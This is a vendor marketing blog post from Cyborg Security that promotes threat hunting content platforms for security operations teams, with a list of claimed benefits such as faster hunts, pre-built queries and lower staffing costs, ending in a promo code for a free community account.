Making the Case for Threat Hunting Content Platforms
By Josh Campbell at Cyborg Security
Threat hunters are often some of the busiest folks in a SOC. One day they may be researching new attack methodologies, the next can see them leading a hunt throughout the environment, and then they may be interpreting gigabytes of log data. This means that for threat hunters, time is literally of the essence, and saving them time is key. One of the biggest “time sinks” for threat hunters is developing the hypothesis and engineering a detection strategy to either falsify or validate that hypothesis. This is where threat hunting content platforms can help.
How Threat Hunting Content Platforms Help
Most hunting teams can only run a handful of hunts each month because it takes so long to build a threat hunting package from scratch. With a content platform, a team can dramatically improve the mean time to deployment (MTTDp), including the number and speed of hunts, without sacrificing efficacy or lumbering itself with false positives.
What are Threat Hunting Content Platforms?
If you haven’t heard of a threat hunting content platform before, you might be wondering what are they?
These platforms provide threat hunters a wealth of highly vetted, constantly updated, behaviorally based threat hunting content to allow them to hunt for the latest adversary tactics, techniques, tools, and exploits. This means that threat hunters can quickly identify and deploy hunts relevant to their organizations, without having to spend days or weeks performing the research.
These platforms also provide that content pre-tailored to an organization’s unique environment. This means that there is no time wasted on development or re-engineering the content or queries to different tools or configurations. It’s all done automatically by the platform.
These platforms aren’t just a one trick pony. They also offer much of the material used to develop the hunt plan, including runbooks, research, mitigation strategies, and even ongoing threat intelligence. The result is that hunters can spend less time on the “busy work” of the pre-hunt and can focus their time on actually threat hunting.
But threat hunting content platforms also offers organizations other significant benefits, including:
More and faster hunts.
It can take weeks to research, build, validate, and contextualize a hunt. A content platform provides instant access to hunting packages built by an expert team — with new packages available within hours or days of a threat surfacing.
No query customization required.
Content packages include queries pre-configured to the hunter’s environment and tool stack. Having this significantly decreases the mean time to deployment (MTTDp) for security teams.
Minimizes manual analysis time.
Quality packages return a manageable number of results with few false positives, meaning that hunters don’t have to wade through meaningless results.
Packages are enriched with relevant context and tagged with alternate names for threats and groups, making it easy for hunters to identify content that fits their needs.
Guides threat hunting.
The packages provided by a content platform are based on current TTPs, high-fidelity CTI, and adversary behaviors. Threat hunters can analyze the latest packages to see which threats currently focus on their industry or location and run those hunts.
Guides data collection.
Threat hunters aren’t logging experts and don’t always know what data is available. Having top-tier content can help them understand the logs their organization should collect and make a case for change if they don’t have them.
Informs ongoing monitoring.
Once a threat hunt has run successfully, it may be suitable to operationalize as an automated detection. Not all content is suitable, but content linked to specific TTPs can often inform ongoing monitoring.
Aids threat hunter development.
Access to high-quality content helps threat hunters develop their skills and understanding by studying how expert hunters research and develop a hunt.
Helps to upskill aspiring threat hunters.
To fill the skills gap, many organizations aim to upskill top performers from other security disciplines. Access to packages developed by expert threat hunters helps aspiring hunters develop their skills.
MUCH lower cost than hiring more FTEs.
Hiring more threat hunters can cost hundreds of thousands of dollars. A content platform can help a threat hunting team dramatically increase productivity, often for less than the cost of a single FTE.
As threat hunting continues to grow in popularity within the information security community, it is imperative that organizations build scalable hunting strategies. This means ensuring their threat hunters’ time is used effectively and efficiently. Threat hunting content platforms enable this, allowing threat hunters to deploy new hunts in hours, instead of days or weeks. It also means that security teams can respond to new threats quickly and with confidence.
Use the promocode “THCPADVANTAGE” to claim your free HUNTER Community Edition account and see how threat hunting platforms can benefit your hunt team!